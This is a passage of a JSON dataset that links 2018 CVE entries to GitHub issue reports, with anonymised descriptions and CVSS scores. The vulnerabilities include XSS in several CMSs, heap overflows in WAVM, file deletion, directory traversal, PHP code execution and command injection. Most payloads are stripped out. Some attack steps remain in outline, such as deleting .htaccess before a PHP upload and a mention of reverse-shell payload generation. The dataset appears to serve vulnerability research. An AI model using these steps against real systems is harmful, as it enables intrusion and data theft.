        "description": "APITAG memory leak. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG ASAN Report: ERRORTAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16759",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/4",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/4",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-07-25T06:11:31Z",
        "description": "There is an xss vulnerability in the site search. Vulnerability file APITAG ERRORTAG $put filters XSS attacks with the APITAG function and the APITAG method is defined in the APITAG file: ERRORTAG Filtered common tags, but still not perfect, you can use some rare events to trigger xss POC APITAG APITAG FILETAG yaml POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG think_template=default; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16764",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/93",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/93",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:02:05Z",
        "description": "APITAG heap buffer overflow parsing running wasm file causing crash . Hello Reporting some possible vul MENTIONTAG Virtual Machine Vul Description: APITAG heap buffer overflow parsing running wasm file causing crash Impact Products version: the latest wavm lib git log pretty=oneline commit APITAG crash detail: APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG d NUMBERTAG a9 bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG d NUMBERTAG a8 in __asan_memcpy PATHTAG NUMBERTAG f4fb NUMBERTAG eb7d7 in APITAG ( PATHTAG NUMBERTAG f4fb NUMBERTAG ead in APITAG ( PATHTAG NUMBERTAG f4fb3dcc NUMBERTAG in APITAG APITAG APITAG ( PATHTAG NUMBERTAG f4fb3ee NUMBERTAG in void APITAG APITAG APITAG const ( PATHTAG NUMBERTAG f4fb3ee1cc1 in void APITAG APITAG APITAG APITAG APITAG void APITAG APITAG NUMBERTAG PATHTAG NUMBERTAG f4fb3e1d NUMBERTAG in void APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG in APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG c in APITAG APITAG ( PATHTAG NUMBERTAG in APITAG const&, APITAG ( PATHTAG NUMBERTAG in APITAG const , APITAG ( PATHTAG NUMBERTAG c in APITAG const&) ( PATHTAG NUMBERTAG a4c in main ( PATHTAG NUMBERTAG f4fafb4eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG aa1 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG f4fb NUMBERTAG c1c NUMBERTAG in APITAG long, unsigned long, std::allocator APITAG const&) APITAG NUMBERTAG f4fb NUMBERTAG c NUMBERTAG in std::basic_string<char, std::char_traits APITAG , std::allocator APITAG >::basic_string(char const , std::allocator APITAG const&) APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16765",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/94",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/94",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:07:25Z",
        "description": "APITAG heap buffer overflow when parsing running wasm file causing crash . FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16766",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/96",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/96",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:09:25Z",
        "description": "APITAG reached unreachable code parsing running wasm file causing crash . FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16767",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/97",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/97",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:10:42Z",
        "description": "APITAG const , APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16768",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/98",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/98",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:11:56Z",
        "description": "APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16769",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/99",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/99",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:13:09Z",
        "description": "APITAG parsing running wasm file causing crash in runtime. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16770",
        "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/100",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/100",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-07-26T13:13:49Z",
        "description": "APITAG long, void const ) parsing running wasm file causing crash. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16771",
        "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/46",
        "Issue_Url_new": "https://github.com/havok89/hoosk/issues/46",
        "Repo_new": "havok89/hoosk",
        "Issue_Created_At": "2018-08-19T00:58:36Z",
        "description": "Arbitrary code execution on NUMBERTAG When install the Hoosk\uff0cyou can put the code APITAG in the APITAG the APITAG can get the phpinfo page. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16772",
        "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/47",
        "Issue_Url_new": "https://github.com/havok89/hoosk/issues/47",
        "Repo_new": "havok89/hoosk",
        "Issue_Created_At": "2018-08-19T06:35:32Z",
        "description": "XSS on Hoosk NUMBERTAG the xss is on the page PATHTAG a text new page, fill the ERRORTAG in the APITAG Title (this is displayed on navigation menus)' field FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16773",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/6",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/6",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-08-24T10:00:54Z",
        "description": "There is a XSS with APITAG the POST file is ERRORTAG FILETAG when we fill the payload in it,close APITAG click the submit again,the xss will trigger FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16774",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/6",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/6",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2018-07-31T02:09:30Z",
        "description": "APITAG NUMBERTAG Arbitrary file deletion. APITAG need to access the page \u201c URLTAG \u201d. Then,delete one of the language. Lastly,use the burpsuit to change the file which you want to delete. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16775",
        "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/3",
        "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/3",
        "Repo_new": "victoralagwu/cmssite",
        "Issue_Created_At": "2018-08-22T07:02:19Z",
        "description": "A cross site scripting (XSS) vulnerability storage. Wonderful works of CMS! I find the security issues on the management settings website: A cross site scripting (XSS) vulnerability is stored in the site name field on the \"ADD\" button under the APITAG menu in APITAG No NUMBERTAG allowing remote attackers to inject arbitrary Web scripts or HTML via fine site names via WITYCMS/ADMIN authenticated HTTP requests FILETAG FILETAG You can insert JS code into the input box when you add the APITAG column, and the code will be executed after saving, which will affect the security of your \"cms\" work Oh!! FILETAG When you query data, you should do a good job of filtering keywords.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16776",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/154",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/154",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-08-20T09:39:32Z",
        "description": "Persistent XSS on APITAG name' field (config FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16779",
        "Issue_Url_old": "https://github.com/hukouhome/blogCMS/issues/1",
        "Issue_Url_new": "https://github.com/town-chen/blogcms/issues/1",
        "Repo_new": "town-chen/blogcms",
        "Issue_Created_At": "2018-08-15T13:26:37Z",
        "description": "There is a storage XSS vulnerability in the blog comment interface . Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker to inject arbitrary Web scripts through the source editor, which may result in an attacker obtaining cookies from other administrators and logging into a Web site backend account. First, browse the website and click on a blog to comment on it. FILETAG According to the next picture, the comment contains malicious APITAG code. FILETAG Now, use the administrator's identity to login to the website backstage and view the comments. FILETAG The background management interface will pop up the administrator's cookie. FILETAG Influence: Any user leaving a message on a Web site can use it to perform an operation and may cause an administrator to hijack cookies",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16780",
        "Issue_Url_old": "https://github.com/dusaurabh/PHP/issues/1",
        "Issue_Url_new": "https://github.com/dusaurabh/php/issues/1",
        "Repo_new": "dusaurabh/php",
        "Issue_Created_At": "2018-08-12T13:38:10Z",
        "description": "There is a storage XSS vulnerability in the blog comment interface. Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker (user) to inject arbitrary Web scripts through the source editor, which will cause the attacker (user) to obtain the cookies of other users and log in to the accounts of other users. First use the account password to log in to the blog. FILETAG When I comment on one of the blogs,I insert malicious code into it. FILETAG The website does not filter characters, and malicious code is directly transmitted to the website management interface. FILETAG When the administrator clicks the Approve option, the malicious code will be executed. FILETAG Now if an ordinary user sees this comment, his cookie will be stolen. FILETAG Impact: This can be used by any user leaving a message on a Web site to perform an operation and may result in hijacking any user's cookie",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16781",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/6",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/6",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2018-08-21T08:28:26Z",
        "description": "APITAG Support && FPE on unknown address. Now this project can only build on MS Windows with gcc/clang, I can't build it. So I write a FILETAG FILETAG to compile it on Linux. But when I run the binary I got this: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16782",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/35",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/35",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2018-09-06T07:56:06Z",
        "description": "stack buffer overflow. /my/imageworsener ./imagew w NUMBERTAG FILETAG FILETAG FILETAG \u2192 out.bmp APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG acb5f at pc NUMBERTAG d2dc bp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG sp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG acb5f thread T NUMBERTAG d2db ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b1db8 ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG f1f NUMBERTAG c1fb NUMBERTAG PATHTAG NUMBERTAG b8b9 ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG acb5f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a9b1f ( PATHTAG ) This frame has NUMBERTAG object(s): FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16784",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/3",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/3",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-09-11T08:41:11Z",
        "description": "XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. FILETAG any problem, mailto: root APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16785",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/4",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/4",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-09-11T08:49:57Z",
        "description": "File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to create script file to obtain webshell. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16805",
        "Issue_Url_old": "https://github.com/b3log/solo/issues/12501",
        "Issue_Url_new": "https://github.com/b3log/solo/issues/12501",
        "Repo_new": "b3log/solo",
        "Issue_Created_At": "2018-09-10T07:38:25Z",
        "description": "\u540e\u53f0\u8fde\u63a5\u7ba1\u7406\u5b58\u5728xss . A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"link\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a FILETAG \u201c APITAG APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG b3log APITAG skin=\"\"; APITAG APITAG Connection: close APITAG URLTAG APITAG APITAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16808",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/9449",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/9449",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2018-09-09T15:38:30Z",
        "description": "APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Payload explanation: We escape from the current td or textarea entity to inject an object entity. We also need to create another td or textarea element since there is a APITAG or APITAG to be associated with. The base NUMBERTAG APITAG stands for APITAG There are some filters used to block XSS like onload, onerror, etc. So using base NUMBERTAG still do the job, it is an example of many NUMBERTAG RISK ======== If exploited, that vulnerability can allow to steal an user session, even the super admin one is the super admin is designed as a validator of that billing. It can also used to make the users do unwilling actions on the application, exfiltrate private data to an unknown destination, etc NUMBERTAG SOLUTION =========== Sanitized properly the query before processing the request. Don't rely on blacklist to protect the application. It is recommended to use htmlentities($parameter, ENT_QUOTE | ENT_HTML5, \"UTF NUMBERTAG true NUMBERTAG REPORT TIMELINE NUMBERTAG Discovery of the vulnerability NUMBERTAG Explanation of the vulnerability NUMBERTAG Determine all of the versions vulnerable to the exploit NUMBERTAG Send full vulnerability details to the Dolibarr's developpers",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16819",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/456",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/456",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-08-29T14:51:26Z",
        "description": "any file delete. Vulnerable URL\uff1a URLTAG touch FILETAG in PATHTAG visit url\uff1a URLTAG the FILETAG will delete APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16820",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/457",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/457",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-08-29T15:35:37Z",
        "description": "directory traversal in in Monstra dev. visit\uff1a FILETAG can traversal any directory example\uff1a APITAG request\uff1a CODETAG response\uff1a APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16831",
        "Issue_Url_old": "https://github.com/smarty-php/smarty/issues/486",
        "Issue_Url_new": "https://github.com/smarty-php/smarty/issues/486",
        "Repo_new": "smarty-php/smarty",
        "Issue_Created_At": "2018-09-05T09:49:07Z",
        "description": "even you enable secrity .trusted_dir can be bypassed. if you enable secrity .$trusted_dir is an array of all directories that are considered trusted. Trusted directories are where you keep php scripts that are executed directly from the templates . the attackers can use ../ to bypass the dir ,if they can editing the templates, they read any file they want. just use {include PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-16832",
        "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/177",
        "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/177",
        "Repo_new": "ysrc/xunfeng",
        "Issue_Created_At": "2018-09-11T12:04:26Z",
        "description": "Found CSRF vulnerability. The APITAG measures have some defects and attacker can bypass it with Flash, by adding APITAG header. After the administrator logged in, open the following page: malicious payload could be injected into the configuration: APITAG Flash source: ERRORTAG The reason for the vulnerability is in PATHTAG line NUMBERTAG the APITAG can be overwrite by APITAG , which is the default behavior of werkzeug wsgi.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16951",
        "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/176",
        "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/176",
        "Repo_new": "ysrc/xunfeng",
        "Issue_Created_At": "2018-09-11T07:48:59Z",
        "description": "Found command injection vulnerability. An attacker can execute arbitrary commands on the xunfeng server after login, the default account is ERRORTAG . Use the following python function the generate the payload for bouncing a command shell, paste it to APITAG > APITAG > APITAG > APITAG and set scan mode to APITAG (change APITAG may shorten the waiting time). CODETAG The reason for the vulnerability is in APITAG line NUMBERTAG which miss to translate the backquote symbol APITAG `. Demo: URLTAG URLTAG Exploit: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2018-16974",
        "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/287",
        "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/287",
        "Repo_new": "jbroadway/elefant",
        "Issue_Created_At": "2018-08-29T11:47:42Z",
        "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG FILETAG Sep NUMBERTAG delete APITAG use delete file api to delete .htaccess POST PATHTAG NUMBERTAG php file upload by pass Use the Windows feature to add spaces after the file name. POC: delete .htaccess success APITAG upload php file success APITAG php code execution APITAG APITAG white list author by:xijun. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16975",
        "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/286",
        "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/286",
        "Repo_new": "jbroadway/elefant",
        "Issue_Created_At": "2018-08-29T08:52:05Z",
        "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG URL: URLTAG POC NUMBERTAG New Stylesheet Name input a php file extension,like FILETAG NUMBERTAG style input your php code ,like APITAG and you will see the php code execution just like the picture APITAG Suggestion: Stylesheet limit php code author by: xijun. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16977",
        "Issue_Url_old": "https://github.com/howchen/howchen/issues/4",
        "Issue_Url_new": "https://github.com/howchen/howchen/issues/4",
        "Repo_new": "howchen/howchen",
        "Issue_Created_At": "2018-09-07T06:38:40Z",
        "description": "Monstra CMS NUMBERTAG allows attachers obtain sensitive information. visit url: ERRORTAG the response error message obtains sensitive information ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16980",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/15274",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/15274",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2018-09-12T10:28:46Z",
        "description": "xss in APITAG Current Behavior dotcms NUMBERTAG exists xss in PATHTAG parameter APITAG and \"inode\" Steps to Reproduce (for bugs) just visite the url: APITAG FILETAG How to fix: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16981",
